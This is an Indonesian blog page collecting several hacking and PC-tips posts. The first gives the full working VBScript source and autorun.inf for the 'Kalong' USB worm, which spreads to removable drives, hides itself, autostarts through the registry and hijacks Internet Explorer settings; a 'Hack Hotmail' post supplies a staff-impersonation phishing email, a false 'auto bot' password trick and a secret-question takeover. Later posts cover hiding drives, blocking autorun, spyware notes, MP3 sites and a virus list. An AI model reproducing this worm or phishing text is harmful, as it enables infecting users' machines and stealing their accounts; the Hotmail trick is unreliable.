Membuat dan Menghapus Virus Autorun tanpa Antivirus

Artikel ini berguna untuk melengkapi artikel sebelumnya, bahan yang digunakan sebagai sampel virus ini yaitu virus dengan nama k4l0n6 yang telah menginfeksi PC gw.
Adapun cara membuat virus autorun sebagai berikut



1. script coding pertama
[autorun] shellexecute=wscript.exe k4l0n6.sys.vbs
simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)
2. script coding kedua
'Kalong-X2 'Varian dari Kalong.VBS on error resume next
'Dim kata-kata berikutdim rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd
'siapkan isi autorunisi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.sys.vbs"set longka = createobject("Scripting.FileSystemObject")set mf = longka.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloopdo
'buat file indukSet windowpath = longka.getspecialfolder(0)Set syspath = longka.getspecialfolder(1)set tf = longka.getfile(syspath & "\recycle.vbs")tf.attributes = 32set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)tf.write rekurtf.closeset tf = longka.getfile(syspath & "\recycle.vbs")tf.attributes = 39
'sebar ke removable disc ditambahkan dengan Autorun.inffor each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")tf.attributes =32set tf=longka.createtextfile(desades.path &"\k4l0n6.sys.vbs",2,true)tf.write rekurtf.closeset tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")tf.attributes = 39
set tf =longka.getfile(desades.path &"\autorun.inf")tf.attributes = 32set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)tf.write isitf.closeset tf = longka.getfile(desades.path &"\autorun.inf")tf.attributes=39end ifnext
'Manipulasi Registryset kalong = createobject("WScript.Shell")
'Ubah IE Titlekalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: X2 ATTACK ::"
'Ubah tulisan pertama pada text box menu RUNkalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KALONG-X2/1"kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"
'Buat pesan saat Windows Startupkalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "KALONG-X2"kalong.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Anda Diambil Alih"
'Aktifkan saat Windows Startupkalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs"
'Ubah Default Start Page Internet Explorerkalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.vaksin.com/"
'Bonusif check <> 1 thenWscript.sleep 200000end ifloop while check <> 1set sd = createobject("Wscript.shell")sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)
secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.
Adapun cara menanggulangi virus tersebut yaitu dengan cara
- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK
- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut
- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)
- setelah itu, file tersebut dihapus/di delete dari komputer
semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang.
Thank’s

Hack Hotmail

Semua pasti bisa, tidak perlu kungfu tinggi cukup niat dan kemauan ada beberapa cara ngehacknya tinggal pilih aja, atau kalo penasaran coba aja semuanya
1. verification auto botcara ini adalah dengan mengirim email ke verificationautobot@hotmail.com, add imel tersebut merupakan bug pada hotmail, caranya :
-----------------------------------------------
To: verificationautobot@hotmail.com
bcc:
cc:
subject:
Passwordlogin name korbanlogin kamu:
password kamu
------------------------------------------------
kalo kamu udah bikin persis seperti diatas lalu kirim, selanjutnya tinggal tunggu biasanya enggak lebih dari seminggu udah dapet imel balasan yg isinya password korban.

2. social engineering
Nah kalo cara ini kita nyamar jadi staffnya hotmail, kita kirim email ke korban sebelum kirim email ke korban kita harus punya email di hotmail, saya menyarankan buat account dengan alamat confirmationactivation@hotmail.com atau reconfirmation@hotmail.com atau terserah kamu yg penting jangan sampai ketahuan korban bahwa kamu bukan staff hotmail, kalo udah bikin selanjutnya
kirim email ke korban@hotmail.com
subyeknya : confirmation atau confirmation activation atau terserah kamu yg penting tujuannya isi emailnya :
-----------------------------------------------
Dear Hotmail® User,The MSN Hotmail servers are currently under heavy stress due to unproportional usage of our email services. Thus The Hotmail Staff has decided to reduce the number of Hotmail accounts by a huge margin to regain its potential.All accounts which are currently not under use shall be removed permanently from our web servers. If you wish to retain your Hotmail account kindly send an email to (the hotmail account you just created) with the subject as "CONFIRMATION" and the message body containing the following details separated by colons(;)Login ; Password ; Date of Birth ; Country

Accounts not confirmed shall be rendered terminated. MSN Hotmail® sincerely regrets the inconvenience caused to its clients.The Hotmail Staff
------------------------------------------------
kalo udah dikirim selanjutnya tinggal tunggu jawaban dari korban.

3. jawab korban secret question
Nah kalo cara ini pertama kamu harus tahu alamat email korban, kalo udah tahu kamu buka hotmail.com, trus klik forgot password dan korban secret question akan muncul, dan kalo kamu beruntung dan apalagi tahu kamu tinggalmenjawabnya, biasanya secret question enggak jauh2 dari who am i ?, whos' my pet name?tinggal kamu coba deh jawab dan kalo jawaban kamu benar, hotmail akan menanyakan kamu untuk menggantipasswd , saya menyarankan untuk tidak menggantinya, karena korban tentu tidak akan bisa membuka accountnyalagi.
selamat mencoba

Menyembunyikan Drive di PC

Sebelumnya maaf jika ada pihak-pihak yang ngerasa dilangkahin about artikel ini, artikel ini gw kutip dari tabloid PCMILD, gue share ni artikel coz mungkin aja da yang belum tau atau sekedar ngingetin lagi bagi yang udah tau. nah bagi yang udah tau, kali aja di artikel ni ada kesalahan, gw mohon jangan diketawain n please send your mail ke alamat dibawah, agar menjadi koreksi dimasa yang akan datang. dah ah basa-basi nya..!! sebenernya ga ada persipan khusus buat ngilangin drive di PC km, cuma ngerubah registry aja kok, berarti yang kamu butuhkan just only PC yang pake OS Win XP (all SP) n Win ME, (kalo di 98 blm dicoba). itu aja......Nah skr ikutin langkah2 nya:
1. Klik tombol START trus lo pilih RUN di jendela RUN tadi itu lo ketik "Regedit" (gak pake tanda kutip)
2. Nah skr lo dah di jendela Registry Editor, trus cari HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Buka folder EXPLORER tadi, trus klik kanan di area kosong di panel bagian kanan, klik NEW trus klik DWORD Value, trus beri nama NoDrives
4. klik ganda NoDrives tadi, trus ubah angka di value data nya sesuai dgn drive mana yg mau lo ilangin, ni angka bwt ngilangin drive nya: Drive A = 1 Drive H = 128 Ngilangin semua drive = 67108863 Drive B = 2 Drive I = 256Drive C = 4 Drive J = 512Drive D = 8 Drive K = 1024Drive E = 16 Drive L = 2048Drive F = 32 Drive M = 4096Drive G = 64 Drive N = 8192
5. kalo udah, close registry editornya trus restart PC nya...!!6. kalo udah lo restart buka My Computer trus liat, ga ada kan drive yang dah lo ilangin tadi....7. tenang aja semua data yang ada di drive tadi aman kok.....suerrr!!!! ==============================================CARA NGEMBALIIN KE SEPERTI SEMULA:
1. ikuti langkah diatas (no 1 ampe no 2) yach!!!!!
2. Buka folder EXPLORER nya, trus cari NoDrives nya
3. Nah di jendela NoDrives, rubah Value Data yang tadinya 4 (misal: untuk drive C) atau angka drive yang dah lo masukin, trus ganti jadi 0 (nol), atau hapus aja langsung nama file NoDrives tadi
4. Restart tuch PC, and than liat aja di my computer drive yang diilangin tadi pasti udah ada......
5. udah gtu doank kok....

Membuat flashdisk aman dari autorun-nya si-virus

Tentunya teman2 semuanya sudah mengetahui bhw virus2 dapat menularkan dirinya ke komputer2 lain dengan media flashdisk. -.-“. Kesal? Sudah pasti! Saya juga merasakan perasaan yang sama ketika komputer saya juga ikut2an kena virus… tapi saya punya cara yang ampuh agar virus yang ada di flashdisk tersebut tidak dapat menularkan dirinya ke komputer lain..

Baiklah saya akan mulai membahasnya sekarang, diawali dengan cara penularan virus lewat media flashdisk. Sebenarnya sangat simple, ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “autorun.inf” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.

Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis dengan beberapa mantra didalamnya, setelah itu kita tinggal mengedit mantra tersebut dengan memblock semua mantra tersebut(ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya. Anda juga bisa menuliskan beberapa puisi indah tentang perdamaian didalamnya ^-^.
Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn? Gigi dibalas dengan gigi, mata dibalas dengan mata, dan yah… anda benar! MANTRA juga DIBALAS DENGAN MANTRA!! Mantranya sangatlah mudah… saya akan membahasnya secara bertahap sekarang juga :


1)buka aplikasi notepad (tempat dimana kita akan menulis mantra)
2)tuliskan mantra “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.
3)langkah selajutnya adalah tulis mantra lagi! Mantranya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).
4)lalu save file mantra tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)
5)lalu jalankan file mantra yang baru kita buat tersebut
6)buka explorer
7)pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter sambil mengucapkan “sim…salabim…”. Maka aplikasi notepad akan muncul lagi sambil menampilkan beberapa tulisan, tetapi yang ini jelas bukan mantra ^-^.

Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh. Hehehe… ^-^.

Spyware yang dilindungi rootkits

Spyware berkembang biak karena berbeda dengan virus, dia membawa keuntungan buat pemakainya. Teknik yang biasa digunakan adalah membajak browser user sehingga menuju website tertentu, mencuri data finacial lewat keylogger atau sekedar menampilkan iklan yang memaksa untuk dikunjungi. Thus besar kecilnya keuntungan yang bisa diraup bergantung pada lamanya spyware itu bercokol di mesin korban. Karakteristik inilah yang menjadikan teknologi spyware dan rootkit akrab secara alamiah. Rootkit yang memang didesain untuk menghindari pendeteksian baik oleh tools maupun oleh os-nya sendiri menjadi pelindung yang baik buat spyware. Untuk menghadapi malware ini selain rajin update av bisa juga menggunakan software-software seperti Microsoft's Rootkit Revealer, F-Secure Corp's Blacklight, Sophos' Anti-Rootkit, McAfee Inc.'s Rootkit Detective dan Trend Micro Inc.'s RootKitBuster.

neeehh

buat yang butuh situs2 gratis buat nyari MP3,gw punya beberapa daftar situs langganan tmen gw.. try it :
1. www.dinberamboi.com
2. www.stafaband.com
3. www.music.download.com
4. www.yourmp3.net
5. www.mp3raid.com
6. www.emp3world.com
7. www.downloadmp3hits.com
8. www.situskugratis.googlepages.com
9. www.mp3-center.org
10. www.wuzam.com
11. www.mp3fresh.net
12. www.tembangkita.googlepages.com

artikel about VIRUS

Serangan dan produksi virus lokal sepertinya mulai melemah. Terbukti, di periode ini, jumlah virus kiriman pembaca dan laporan - laporan mengenai penyebaran virus mulai berkurang, namun kita harus selalu tetap waspada.

Tren virus kali ini sepertinya mengarah kepada virus jenis VBScript. Laporan penyebaran virus jenis script ini lebih banyak jika dibandingkan jenis virus biasa yang sudah dikenal dalam bentuk executable. Berikut daftar selengkapnya:

1. Gen.VirVBS.vbs
Virus ini dihasilkan oleh sebuah program Virus Generator yang dinamakan Vir.VBS Generator oleh pembuatnya. Program ini dibuat menggunakan Visual Basic. Ukuran dari program tersebut cukup kecil, sekitar 64.512 bytes dalam keadaan terkompresi menggunakan UPX. Generator ini mengklaim dirinya dapat menghasilkan virus jenis VBScript yang memiliki beberapa kemampuan seperti stealth, encryption, time-bomb bahkan polymorphic. Virus yang dihasilkan sudah cukup banyak dan terbukti menyebar, maka tidak heran ia menduduki peringkat pertama di 10 virus teratas periode kali ini.

2. ForrisWaitme
Virus yang dibuat dengan Visual Basic ini menggunakan icon mirip folder standar Windows untuk melakukan penyamarannya. Beberapa ulahnya adalah menukar fungsi tombol mouse kiri dengan kanan, menghilangkan menu Folder Options, membuat file pesan “baca saya.txt” pada drive terinfeksi, dan masih ada yang lainnya.

3. Kalong.vbs
Dibuat menggunakan VBScript (.vbs). Selain menciptakan file autorun.inf pada flash disk agar dapat running otomatis, caption dari Internet Explorer pun akan diubah menjadi “:: X2 ATTACK ::” saat terinfeksi virus ini. Selain itu, pada saat logon, Windows akan menampilkan kotak informasi yang bertuliskan “KOMPUTER ANDA ADA KEYBOARDNYA!!”.

4. Pray
Virus lokal ini dibuat menggunakan Visual Basic. Kami mendapati 2 varian dari virus ini, untuk varian Pray.A tidak memiliki icon, sementara untuk varian Pray.B menggunakan icon mirip Windows Explorer. Jika komputer terinfeksi oleh virus ini, saat penunjuk waktu di komputer tersebut menunjukan pukul 05:15, 13:00, 16:00, 18:30, dan atau 19:45, virus ini akan menampilkan pesan yang mengingatkan user untuk melakukan shalat.

5. Discusx.vbs
Virus VBScript yang satu ini, memiliki ukuran sekitar 4.800 bytes. Dia akan mencoba menginfeksi di beberapa drive di komputer Anda, termasuk drive flash disk, yang jika terinfeksi akan membuat file autorun.inf dan System32.sys.vbs pada root drive tersebut. Selain itu, ia pun akan mengubah caption dari Internet Explorer menjadi “.::Discus-X SAY MET LEBARAN! [HAPPY LEBARAN ?!]::.”.

6. SangPerawan
Virus ini dapat mengakibatkan file .jpg Anda tidak bisa dibuka, karena virus ini akan meng-append file .jpg yang ditemukannya ke dalam tubuh sang virus. Ia dibuat dengan Visual Basic, dengan ukuran sekitar 98.304 bytes tanpa di-compress. Isi field Description pada Version Information virus ini terdapat kalimat “Untuk semua orang yang tak pernah menghargai aku”.

7. TQ.vbs
Virus VBScript ini akan membuat file winconfig.dll.vbs dan autorun.inf pada root drive yang diinfeksinya. Jika file virus dibuka dengan Notepad, pada awal-awal file tersebut akan terdapat string aneh yang sebenarnya hanya untuk membingunggkan user saja, tapi jika Anda scroll ke bawah maka akan terlihat isi file virus sebenarnya. Virus ini pun mengubah caption Internet Explorer menjadi “Brought to you by TQ!” dan mengubah halaman defaultnya menjadi “http://blogtq.blogspot.com/”.

8. SlowButSure.vbs
Dibuat menggunakan VBScript (.vbs). Ia menciptakan file autorun.inf yang sudah dirancangnya pada flash disk, sehingga dapat running otomatis saat mengakses drive flash disk. Pada caption Internet Explorer akan terdapat tulisan “Hacked by Zay” atau pada varian lain “Hacked by Godzilla”. Dan pada System Propertis komputer korban, informasi Registered Owner akan menjadi “r4n694-24y”, dan untuk Registered Organization akan menjadi “Don’t Panic, System anda sudah kami ambil alih !”.

9. Tati
Virus sederhana berbasis script, dibuat menggunakan AutoHotKey, program semacam automation script. Tidak menggunakan teknik yang canggih-canggih. Hanya berkamuflase dengan menggunakan icon mirip folder standar Windows. Pada root drive komputer terinfeksi, akan terdapat file teks yang berisi pesan dari si pembuat virus dengan nama tati.my.love.txt.

10.Stargate

Dibuat menggunakan Visual Basic. Menggunakan icon mirip folder standar Windows untuk menyamar. Ia dapat menyebar melalui flash disk ataupun jaringan (network) melalui sharing folder. Virus ini menghalalkan segala cara agar ia dapat bertahan hidup selama-lamanya di komputer korban, diantaranya dengan mem-bypass beberapa aplikasi bawaan Windows seperti Registry Editor, Command Prompt, dan juga beberapa program antivirus. Pada komputer terinfeksi, akan terdapat banyak sekali file duplikat dari si virus, bahkan beberapa icon aplikasi di Start Menu pun akan berubah menjadi icon folder karena ulah virus ini

from virusindonesia